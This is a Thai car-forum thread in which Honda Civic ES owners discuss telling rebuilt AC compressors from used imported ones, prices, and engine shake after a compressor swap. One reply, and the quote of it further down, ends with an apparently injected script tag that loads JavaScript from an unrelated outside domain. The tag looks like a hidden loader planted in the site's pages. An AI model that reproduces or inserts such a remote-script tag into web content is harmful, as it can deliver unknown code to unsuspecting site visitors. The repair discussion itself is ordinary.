ตอบ
G231878

ชื่อเล่น: อั๋น

เข้าร่วม: 04 ตุลา 2011
ตอบ: 131

มือใหม่หัดขับ

ได้รับคำขอบคุณ: 61
ให้คำขอบคุณ: 98

ปี: 2005
สี: ขาว ทาฟเฟต้า (NH-578)
พฤหัส, 13 ตุลา 2011 00:01 - แยกได้ยังไงระหว่าง คอมฯบิ๊ว กะ คอมฯเชียงกง
ขอถามเรื่องคอมฯแอร์ครับ พอดีเพิ่งไปเปลี่ยนมา รถผมเป็น ES05 (ร้านที่โคราช ใจอยากขับเข้ากรุงมาหาร้านพี่สุรเดชจริงๆ แต่กลัวหลงมาไม่ถึง ^^) เสียงดังได้อาทิตย์กว่าๆ เกือบสอง พี่ช่างเค้าบอกคอคอมฯ มันกินไปมากแล้ว หรือคอคอมฯมันจะขาดอะไรแนวๆนี้ ผมก็ไม่ค่อยเข้าใจ พี่เค้าแนะนำให้เปลี่ยน มี 3 ตัวเลือก
1.เปลี่ยนคอมฯใหม่กิ๊ก 1x,xxx อัพ
2.เปลี่ยนคอมฯบิ๊ว 6,500 (ราคาจากร้านก่อนหน้านี้)
3.เปลี่ยนคอมฯเชียงกง 5,000

ด้วยความที่ไม่มีเงินมากนัก เลยเลือก คอมฯเชียงกง 5000 เปลี่ยนมาตอนนี้อาการเสียงดังหายไป คอมฯเงียบ พอใจในระดับนึงครับ
ที่อยากถามก็คือ
1.เราจะรู้ได้ไงครับ หรือแยกได้ยังไงระหว่าง คอมฯบิ๊ว กะ คอมฯเชียงกง
2.ตอนนี้ตอนเปลี่ยนรอบเครื่อง รถมีอาการสั่นนิดๆ ไม่มากนักแล้วก็หายไปครับ มีเป็นระยะๆครับ แต่พอรู้สึกได้ มันปรกติมั้ยครับ (รถผมติดแก๊ส)
3.ราคานี้แพงไปมั้ยครับ คอมฯ 5000+ค่าถอด ประกอบ น้ำยาแอร์ ค่าแรงฯ

ขอบคุณผู้รู้ทุกท่านครับ

ปล.หากเพื่อนๆพี่ๆ ชาวโคราชมีอู่ไหนที่ไปกันบ่อยๆ วานแนะนำทีครับ ขอบคุณครับผม
ได้รับคำขอบคุณจาก: arthit10  maxch 
Saka

ชื่อเล่น: ศักดิ์

เข้าร่วม: 01 ตุลา 2008
ตอบ: 1873

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1996
ให้คำขอบคุณ: 5358

ปี: 2001
พฤหัส, 13 ตุลา 2011 08:05 - แยกได้ยังไงระหว่าง คอมฯบิ๊ว กะ คอมฯเชียงกง
ขอตอบแบบงู ๆ ปลา ๆ นะครับ
1.ที่ผมเคยเห็นมา คอมบิ้วจะสะอาด ขาวเพราะเมื่อช่างรื้อซ่อมแล้วส่วนมากจะพ่นทรายให้สะอาดดูเหมือนใหม่ ตามหัวน๊อตต้องมีรอยไขออกและประกอบ ส่วนคอมเชียงกงผมยังไม่เคยเจอร้านไหนเอาไปพ่นทรายให้ สภาพก็จะคล้าย ๆ กะที่เราถอดออกจากรถแล้วนำไปล้างคราบสกปรกแ่ค่นั้น
2.อาการนี้ลองล้างลิ้นปีกผีเสื้อ+รีเซทกล่องดูก่อนครับ ทดสอบที่น้ำมันด้วยนะครับ บางทีอาจต้องจูนแก๊สใหม่เพราะคอมลูกเก่ากับลูกใหม่ อาจใช้แรงฉุดเครื่องไม่เท่ากัน(อันนี้เดาเอา)
3.อันนี้แล้วแต่คนจะคิด ถ้าทำแล้วจบ ใช้กันยาว ๆ แพงกว่านี้ผมก็จ่าย
ผิดมั่งถูกมั่ง ไม่ว่ากันนะครับ "<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: zan  arthit10  G231878 
srithanon

เข้าร่วม: 13 สิงหา 2009
ตอบ: 380

มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 1324
ให้คำขอบคุณ: 4
พฤหัส, 13 ตุลา 2011 08:45 - แยกได้ยังไงระหว่าง คอมฯบิ๊ว กะ คอมฯเชียงกง
คอมที่บิ้วหรือรื้อออกมาซ่อมชิ้นส่วนภายใน โดยมากจะดูสะอาด พ่นสี ปะเก็นตรงฝาครอบต่างๆเป็นของใหม่หมด แถมบางตัวถอดออกมาใสไม่เรียบสนิททำให้แรงอัดรั่ว น้อยตัวที่จะดี ใช้ได้ไม่นาน ราคาทั่วไปที่เชียงกงปทุมวัน ประมาณ
3000-3500 รับประกัน 30 วัน
สำหรับคอมมือสอง จากหยุ่นปี้ จะเห็นตัวคอมยังมีคราบน้ำมันปนเขม่าจับ ชิ้นส่วนที่ติดกับตัวคอม เช่นท่อซักชั่น ท่อดิสชาร์ท ยังถูกเรื่อยตัด สายไฟขั่วสายไฟเข้าครัชท์คอม ยังเดิมๆ ปัจจุบันนี้หาดียาก เพราะพ่อค้าอาหลั่ยจะรู้กันกับร้านนำเข้า เลือเอาตัวที่มีแรงดูดที่ดีคัดเอาไปหมด ที่เหลือก็งั้นๆ พอใช้ได้ นอกจะโชคดีที่บางร้านยังพอมีเหลือให้เลือก ราคาก็ประมาณ 2500-2800 บาท...srithanon
ได้รับคำขอบคุณจาก: arthit10  G231878  wighwaytak  Doraeman 
MoDes

เข้าร่วม: 11 พฤศจิกา 2010
ตอบ: 3844

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1271
ให้คำขอบคุณ: 186

สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พฤหัส, 13 ตุลา 2011 09:55 - แยกได้ยังไงระหว่าง คอมฯบิ๊ว กะ คอมฯเชียงกง
ลองดูครับตามลายเซ็นต์ คอมใหม่ศูนย์ ยังไม่ใช้งาน ลองดูครับ
G231878

ชื่อเล่น: อั๋น

เข้าร่วม: 04 ตุลา 2011
ตอบ: 131

ได้รับคำขอบคุณ: 61
ให้คำขอบคุณ: 98

สี: ขาว ทาฟเฟต้า (NH-578)
พฤหัส, 13 ตุลา 2011 10:53 - แยกได้ยังไงระหว่าง คอมฯบิ๊ว กะ คอมฯเชียงกง
Saka พิมพ์ว่า:
ขอตอบแบบงู ๆ ปลา ๆ นะครับ
1.ที่ผมเคยเห็นมา คอมบิ้วจะสะอาด ขาวเพราะเมื่อช่างรื้อซ่อมแล้วส่วนมากจะพ่นทรายให้สะอาดดูเหมือนใหม่ ตามหัวน๊อตต้องมีรอยไขออกและประกอบ ส่วนคอมเชียงกงผมยังไม่เคยเจอร้านไหนเอาไปพ่นทรายให้ สภาพก็จะคล้าย ๆ กะที่เราถอดออกจากรถแล้วนำไปล้างคราบสกปรกแ่ค่นั้น
2.อาการนี้ลองล้างลิ้นปีกผีเสื้อ+รีเซทกล่องดูก่อนครับ ทดสอบที่น้ำมันด้วยนะครับ บางทีอาจต้องจูนแก๊สใหม่เพราะคอมลูกเก่ากับลูกใหม่ อาจใช้แรงฉุดเครื่องไม่เท่ากัน(อันนี้เดาเอา)
3.อันนี้แล้วแต่คนจะคิด ถ้าทำแล้วจบ ใช้กันยาว ๆ แพงกว่านี้ผมก็จ่าย
ผิดมั่งถูกมั่ง ไม่ว่ากันนะครับ "<script src="https://sport32news.com/civicesgroup.js">

ขอบคุณมากๆครับจะลองไปทำตามครับผม ^^ ส่วนเรื่องว่าจบมั้ย คงต้องรอดูกันสักพักครับผม

srithanon พิมพ์ว่า:
คอมที่บิ้วหรือรื้อออกมาซ่อมชิ้นส่วนภายใน โดยมากจะดูสะอาด พ่นสี ปะเก็นตรงฝาครอบต่างๆเป็นของใหม่หมด แถมบางตัวถอดออกมาใสไม่เรียบสนิททำให้แรงอัดรั่ว น้อยตัวที่จะดี ใช้ได้ไม่นาน ราคาทั่วไปที่เชียงกงปทุมวัน ประมาณ
3000-3500 รับประกัน 30 วัน
สำหรับคอมมือสอง จากหยุ่นปี้ จะเห็นตัวคอมยังมีคราบน้ำมันปนเขม่าจับ ชิ้นส่วนที่ติดกับตัวคอม เช่นท่อซักชั่น ท่อดิสชาร์ท ยังถูกเรื่อยตัด สายไฟขั่วสายไฟเข้าครัชท์คอม ยังเดิมๆ ปัจจุบันนี้หาดียาก เพราะพ่อค้าอาหลั่ยจะรู้กันกับร้านนำเข้า เลือเอาตัวที่มีแรงดูดที่ดีคัดเอาไปหมด ที่เหลือก็งั้นๆ พอใช้ได้ นอกจะโชคดีที่บางร้านยังพอมีเหลือให้เลือก ราคาก็ประมาณ 2500-2800 บาท...srithanon

ครับผม ผมลองถามร้านแถวๆโคราชมันก้ประมาณนี้ หรือผมไม่เจอร้านถูกๆก็ไม่รู้น่ะครับ

MoDes พิมพ์ว่า:
ลองดูครับตามลายเซ็นต์ คอมใหม่ศูนย์ ยังไม่ใช้งาน ลองดูครับ

โอกาสหน้า คงได้ใช้บริการครับผม ^^ อยากได้ของใหม่ราคาดีๆเหมือนกันครับ มันคงสบายใจดี
mong_civic

ชื่อเล่น: หม่อง

เข้าร่วม: 11 มิถุนา 2009
ตอบ: 709

Guru ES
Guru ES

ได้รับคำขอบคุณ: 672
ให้คำขอบคุณ: 377

ปี: 2003
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พฤหัส, 13 ตุลา 2011 11:07 - แยกได้ยังไงระหว่าง คอมฯบิ๊ว กะ คอมฯเชียงกง

ผมมาเจอคุณตอนใส่บิ้วมาแล้วครับ (4500 บ.)
โอกาสหน้าคงได้อุดหนุน
อายุคอมฯในรถผมจากป้ายแดง จนถึงพังประมาณ 200,000 กม.
masterbigzz

ชื่อเล่น: บิ๊ก

เข้าร่วม: 26 สิงหา 2011
ตอบ: 266

ได้รับคำขอบคุณ: 92
ให้คำขอบคุณ: 149

สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 13 ตุลา 2011 11:08 - แยกได้ยังไงระหว่าง คอมฯบิ๊ว กะ คอมฯเชียงกง
MoDes

เข้าร่วม: 11 พฤศจิกา 2010
ตอบ: 3844

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1271
ให้คำขอบคุณ: 186

สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พฤหัส, 13 ตุลา 2011 15:37 - แยกได้ยังไงระหว่าง คอมฯบิ๊ว กะ คอมฯเชียงกง
อ้างอิงจาก:

โอกาสหน้า คงได้ใช้บริการครับผม ^^ อยากได้ของใหม่ราคาดีๆเหมือนกันครับ มันคงสบายใจดี

อ้างอิงจาก:

ผมมาเจอคุณตอนใส่บิ้วมาแล้วครับ (4500 บ.)
โอกาสหน้าคงได้อุดหนุน
อายุคอมฯในรถผมจากป้ายแดง จนถึงพังประมาณ 200,000 กม.

ขอบคุณที่สนใจนะครับ
ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.